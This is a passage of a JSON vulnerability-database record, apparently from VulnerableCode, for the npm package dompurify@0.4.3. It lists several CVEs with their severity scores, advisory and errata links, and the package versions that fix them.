"https://access.redhat.com/errata/RHSA-2025:22284", "reference_id": "RHSA-2025:22284", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:22284" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:8544", "reference_id": "RHSA-2025:8544", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:8544" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:8551", 
"reference_id": "RHSA-2025:8551", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:8551" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/371910?format=api", "purl": "pkg:npm/dompurify@2.4.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-37xc-54fs-8fh6" }, { "vulnerability": "VCID-3fxk-2qcb-jfa3" }, { "vulnerability": "VCID-56ww-dvtp-8uc2" }, { "vulnerability": "VCID-77rz-yewt-77cq" }, { "vulnerability": "VCID-8tpw-rcyz-xuhu" }, { "vulnerability": "VCID-cmrb-k5pw-vffn" }, { "vulnerability": "VCID-jnpe-6ax6-zubr" }, { "vulnerability": "VCID-z8n7-dz6p-zqfb" }, { "vulnerability": "VCID-zaud-3sc4-ykcg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.4.2" } ], "aliases": [ "CVE-2024-48910", "GHSA-p3vf-v8qc-cwcr" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-wmjr-1h3n-hbhb" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/20937?format=api", "vulnerability_id": "VCID-z8n7-dz6p-zqfb", "summary": "", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-47875.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.0", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-47875.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-47875", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00699", "scoring_system": "epss", "scoring_elements": "0.72542", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00699", "scoring_system": "epss", "scoring_elements": "0.72547", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00699", "scoring_system": "epss", "scoring_elements": "0.72532", 
"published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00699", "scoring_system": "epss", "scoring_elements": "0.72455", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-47875" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47875", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47875" }, { "reference_url": "http://seclists.org/fulldisclosure/2025/Apr/14", "reference_id": "", "reference_type": "", "scores": [ { "value": "10.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H" }, { "value": "7.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:H/SA:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "http://seclists.org/fulldisclosure/2025/Apr/14" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://lists.debian.org/debian-lts-announce/2025/02/msg00010.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "10.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H" }, { "value": "7.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:H/SA:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.debian.org/debian-lts-announce/2025/02/msg00010.html" }, { "reference_url": "https://github.com/cure53/DOMPurify/commit/0ef5e537a514f904b6aa1d7ad9e749e365d7185f", "reference_id": 
"0ef5e537a514f904b6aa1d7ad9e749e365d7185f", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H" }, { "value": "10.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H" }, { "value": "7.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:H/SA:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-11T19:27:35Z/" } ], "url": "https://github.com/cure53/DOMPurify/commit/0ef5e537a514f904b6aa1d7ad9e749e365d7185f" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1084983", "reference_id": "1084983", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1084983" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318052", "reference_id": "2318052", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318052" }, { "reference_url": "https://github.com/cure53/DOMPurify/commit/6ea80cd8b47640c20f2f230c7920b1f4ce4fdf7a", "reference_id": "6ea80cd8b47640c20f2f230c7920b1f4ce4fdf7a", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H" }, { "value": "10.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H" }, { "value": "7.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:H/SA:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-11T19:27:35Z/" } ], "url": 
"https://github.com/cure53/DOMPurify/commit/6ea80cd8b47640c20f2f230c7920b1f4ce4fdf7a" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47875", "reference_id": "CVE-2024-47875", "reference_type": "", "scores": [ { "value": "10.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H" }, { "value": "7.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:H/SA:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47875" }, { "reference_url": "https://github.com/advisories/GHSA-gx9m-whjm-85jf", "reference_id": "GHSA-gx9m-whjm-85jf", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-gx9m-whjm-85jf" }, { "reference_url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-gx9m-whjm-85jf", "reference_id": "GHSA-gx9m-whjm-85jf", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H" }, { "value": "10.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:H/SA:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-11T19:27:35Z/" } ], "url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-gx9m-whjm-85jf" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:10236", "reference_id": "RHSA-2024:10236", "reference_type": "", "scores": [], "url": 
"https://access.redhat.com/errata/RHSA-2024:10236" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:10988", "reference_id": "RHSA-2024:10988", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:10988" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:8327", "reference_id": "RHSA-2024:8327", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:8327" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:8678", "reference_id": "RHSA-2024:8678", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:8678" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:8683", "reference_id": "RHSA-2024:8683", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:8683" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:8981", "reference_id": "RHSA-2024:8981", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:8981" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:8991", "reference_id": "RHSA-2024:8991", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:8991" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:9473", "reference_id": "RHSA-2024:9473", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:9473" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:9620", "reference_id": "RHSA-2024:9620", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:9620" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:9629", "reference_id": "RHSA-2024:9629", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:9629" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:0329", "reference_id": "RHSA-2025:0329", "reference_type": "", "scores": [], 
"url": "https://access.redhat.com/errata/RHSA-2025:0329" }, { "reference_url": "https://github.com/cure53/DOMPurify/blob/0ef5e537a514f904b6aa1d7ad9e749e365d7185f/test/test-suite.js#L2098", "reference_id": "test-suite.js#L2098", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H" }, { "value": "10.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H" }, { "value": "7.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:H/SA:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-11T19:27:35Z/" } ], "url": "https://github.com/cure53/DOMPurify/blob/0ef5e537a514f904b6aa1d7ad9e749e365d7185f/test/test-suite.js#L2098" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/33800?format=api", "purl": "pkg:npm/dompurify@2.5.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-37xc-54fs-8fh6" }, { "vulnerability": "VCID-3fxk-2qcb-jfa3" }, { "vulnerability": "VCID-56ww-dvtp-8uc2" }, { "vulnerability": "VCID-77rz-yewt-77cq" }, { "vulnerability": "VCID-8tpw-rcyz-xuhu" }, { "vulnerability": "VCID-cmrb-k5pw-vffn" }, { "vulnerability": "VCID-jnpe-6ax6-zubr" }, { "vulnerability": "VCID-zaud-3sc4-ykcg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.5.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/33396?format=api", "purl": "pkg:npm/dompurify@3.1.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-37xc-54fs-8fh6" }, { "vulnerability": "VCID-3fxk-2qcb-jfa3" }, { "vulnerability": "VCID-77rz-yewt-77cq" }, { "vulnerability": "VCID-8d4n-d1dh-4fe9" }, { "vulnerability": "VCID-8tpw-rcyz-xuhu" }, { "vulnerability": 
"VCID-cmrb-k5pw-vffn" }, { "vulnerability": "VCID-cv62-a95x-9uhe" }, { "vulnerability": "VCID-jnpe-6ax6-zubr" }, { "vulnerability": "VCID-r6b8-q386-3ken" }, { "vulnerability": "VCID-zaud-3sc4-ykcg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.1.3" } ], "aliases": [ "CVE-2024-47875", "GHSA-gx9m-whjm-85jf" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-z8n7-dz6p-zqfb" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/23368?format=api", "vulnerability_id": "VCID-zaud-3sc4-ykcg", "summary": "", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-26791.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-26791.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-26791", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00168", "scoring_system": "epss", "scoring_elements": "0.37901", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00168", "scoring_system": "epss", "scoring_elements": "0.37914", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00168", "scoring_system": "epss", "scoring_elements": "0.37888", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00168", "scoring_system": "epss", "scoring_elements": "0.37711", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-26791" }, { "reference_url": "https://ensy.zip/posts/dompurify-323-bypass", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", 
"scoring_elements": "" } ], "url": "https://ensy.zip/posts/dompurify-323-bypass" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://nsysean.github.io/posts/dompurify-323-bypass", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nsysean.github.io/posts/dompurify-323-bypass" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26791", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26791" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1098325", "reference_id": "1098325", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1098325" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2345695", "reference_id": "2345695", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2345695" }, { "reference_url": "https://github.com/cure53/DOMPurify/releases/tag/3.2.4", "reference_id": "3.2.4", "reference_type": "", "scores": [ { "value": "4.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", 
"scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-14T15:30:30Z/" } ], "url": "https://github.com/cure53/DOMPurify/releases/tag/3.2.4" }, { "reference_url": "https://github.com/cure53/DOMPurify/commit/d18ffcb554e0001748865da03ac75dd7829f0f02", "reference_id": "d18ffcb554e0001748865da03ac75dd7829f0f02", "reference_type": "", "scores": [ { "value": "4.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-14T15:30:30Z/" } ], "url": "https://github.com/cure53/DOMPurify/commit/d18ffcb554e0001748865da03ac75dd7829f0f02" }, { "reference_url": "https://ensy.zip/posts/dompurify-323-bypass/", "reference_id": "dompurify-323-bypass", "reference_type": "", "scores": [ { "value": "4.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-14T15:30:30Z/" } ], "url": "https://ensy.zip/posts/dompurify-323-bypass/" }, { "reference_url": "https://nsysean.github.io/posts/dompurify-323-bypass/", "reference_id": "dompurify-323-bypass", "reference_type": "", "scores": [ { "value": "4.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-14T15:30:30Z/" } ], "url": "https://nsysean.github.io/posts/dompurify-323-bypass/" }, { "reference_url": "https://github.com/advisories/GHSA-vhxf-7vqr-mrjg", "reference_id": "GHSA-vhxf-7vqr-mrjg", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": 
"https://github.com/advisories/GHSA-vhxf-7vqr-mrjg" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:10020", "reference_id": "RHSA-2025:10020", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:10020" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:1875", "reference_id": "RHSA-2025:1875", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:1875" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:2518", "reference_id": "RHSA-2025:2518", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:2518" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:3368", "reference_id": "RHSA-2025:3368", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:3368" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:3397", "reference_id": "RHSA-2025:3397", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:3397" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:3886", "reference_id": "RHSA-2025:3886", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:3886" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:7626", "reference_id": "RHSA-2025:7626", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:7626" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2737", "reference_id": "RHSA-2026:2737", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2737" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2769", "reference_id": "RHSA-2026:2769", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2769" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:3406", "reference_id": "RHSA-2026:3406", "reference_type": "", "scores": [], 
"url": "https://access.redhat.com/errata/RHSA-2026:3406" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/377348?format=api", "purl": "pkg:npm/dompurify@3.2.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-37xc-54fs-8fh6" }, { "vulnerability": "VCID-3fxk-2qcb-jfa3" }, { "vulnerability": "VCID-77rz-yewt-77cq" }, { "vulnerability": "VCID-8d4n-d1dh-4fe9" }, { "vulnerability": "VCID-8tpw-rcyz-xuhu" }, { "vulnerability": "VCID-cmrb-k5pw-vffn" }, { "vulnerability": "VCID-cv62-a95x-9uhe" }, { "vulnerability": "VCID-jnpe-6ax6-zubr" }, { "vulnerability": "VCID-r6b8-q386-3ken" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.2.4" } ], "aliases": [ "CVE-2025-26791", "GHSA-vhxf-7vqr-mrjg" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zaud-3sc4-ykcg" } ], "fixing_vulnerabilities": [], "risk_score": "4.5", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@0.4.3" }